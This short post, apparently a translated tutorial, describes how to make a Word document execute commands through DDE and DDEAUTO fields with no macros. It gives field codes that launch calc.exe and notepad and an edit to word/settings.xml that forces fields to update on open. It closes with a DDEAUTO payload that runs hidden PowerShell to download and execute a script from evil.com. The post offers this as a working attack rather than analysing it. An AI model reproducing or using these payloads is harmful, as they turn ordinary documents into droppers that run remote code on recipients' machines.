Today learned a new way Word code execution, but also do not need to enable macros, so for everyone to share a wave. Operation is also very simple.
First create a new word document and then insert the field:
select = (Formula)
Right, switching field code
Modify code where:
1 |
{DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe" } |
After that, the right to update the domain, and then change the file docxformat can be. The final results are as follows:
Relatively tasteless point is that will be performed later.
Except that DDEAUTOuse DDEit is also possible, as follows:
1 |
{DDE "c:\\windows\\system32\\cmd.exe" "/c notepad" } |
It should be noted that the use of DDE is not performed automatically, you need to make changes to the document, the document will be renamed to rar, later amended to open word/settings.xml, add
1 |
<w:updateFields w:val="true"/> |
Using DDE effect is as follows:
Personal feeling better use DDE point.
How to get an interactive shell?
1 |
{ DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://evil.com/evil.ps1');powershell -e $e "} |